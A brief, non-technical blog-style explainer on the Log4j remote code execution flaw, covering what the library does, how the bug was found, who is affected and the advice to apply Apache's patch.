A security flaw in the Java library Log4j is currently being exploited by hackers. The bug allows a remote server to execute malicious code on a targeted machine, & since this library is used by almost every Java application running on the Internet & on private Intranets, it’s a serious cause for concern.
What Is Log4j?
Log4j is a logging system which allows software developers to track usage events, software interaction & user communication. Messages are written, automatically, to a log file (a record of everything that happens in the application). Ceki Gülcü authored the 1st version of the program for Apache Logging Services & it’s a project that is part of the Apache Software Foundation. It’s open source code & widely used by software developers who use various libraries to complete repetitive tasks in software development – a developer will build their software for a particular use case on top of a host of libraries, often this code is accepted as is & not checked for vulnerabilities.
How Can It Be Manipulated?
Log4j includes a bug of a type that is inexcusable in professional software development, & it’s incomprehensible that it’s been left to run at all & particularly for this long. The bug allows a user to write an unfiltered “string” (text) to the log file that sends a remote address. The address is then added to the system as an acceptable repository of code & the hacker can then run almost any auto software on the system to steal data, change the execution or, well, use your imagination, because it’s that serious & that bad. The real question here is how could this have happened in the first place – filtering data for malicious Content is lesson 101 for any software developer?
How Was It Discovered?
The vulnerability was 1st discovered by Alibaba’s security team. Subsequently, Minecraft discovered hackers manipulating their system via their chat software. The alert went viral & warnings were issued by the US Government’s cybersecurity agency, Microsoft Corp & Cisco Inc, to name a few.
Who Is Affected by Log4j
Millions of servers, if not billions across the globe use this library. Hackers such as professional crypto-miners & those using DDoS botnets, are in their tenth delight. Companies such as Apple, Tesla, IBM, Microsoft, Steam, Twitter, Baidu, & Cloudflare are all affected. Millions of small & medium sized businesses could also be at risk.
What should you do if you think you’re affected
The Apache Software Foundation has issued a bug fix & has, urgently, advised all users to upgrade to the patch they’ve supplied. However, millions of smaller enterprises who use the code, may not even be aware of the problem, or they may not realize that their system uses Log4j. For a detailed technical analysis of the issue & how to address it see Naked Security.
You may want to read this: One more bug leaves millions of user photos exposed
